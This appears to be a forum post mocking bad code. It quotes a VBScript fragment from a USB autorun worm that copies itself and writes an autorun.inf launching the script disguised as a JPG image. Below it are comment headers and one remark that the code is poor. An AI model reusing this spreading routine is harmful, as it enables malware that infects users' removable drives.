- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
if (not fso.fileexists(fname)) or (not fso.fileexixts(aname)) then
if (fso.fileexists(fname)=false) then
fso.copyfile wscript.scriptname,fname
end if
if (fso.fileexists(aname)=false) then
set au=fso.createtextfile aname,2,true
au.writeline "[AutoRun]"
au.writeline "shellexecute=wscript /e:vbs pamela handerson.jpg -autostart"
au.close
fso.getfile(aname).attributes=32
set au=nothing
end if
end if
...
Lokich 21.07.2015 21:20 # 0
3_14dar 21.07.2015 21:30 # −2
1024-- 21.07.2015 21:41 # −1
3_14dar 21.07.2015 21:47 # −3
Pyriandr 21.07.2015 22:40 # +1
if (not fso.fileexists(fname)) or (not fso.fileexixts(aname)) then - это лишнее, не говоря уже о том, что код - говно.
3_14dar 22.07.2015 00:19 # −3
inkanus-gray 23.07.2015 22:40 # −1
cohisevi 23.07.2015 22:48 # −1
Pyriandr 23.07.2015 22:55 # +2
inkanus-gray 23.07.2015 23:08 # −1
Patriarkh_Kirill 23.07.2015 23:21 # 0
inkanus-gray 23.07.2015 23:32 # +4
kegdan 23.07.2015 23:57 # −1
guest 24.07.2015 00:07 # +1
kegdan 23.07.2015 23:57 # −1
Stertor 27.07.2015 20:55 # −102
MEJlOMAH 03.02.2020 01:23 # 0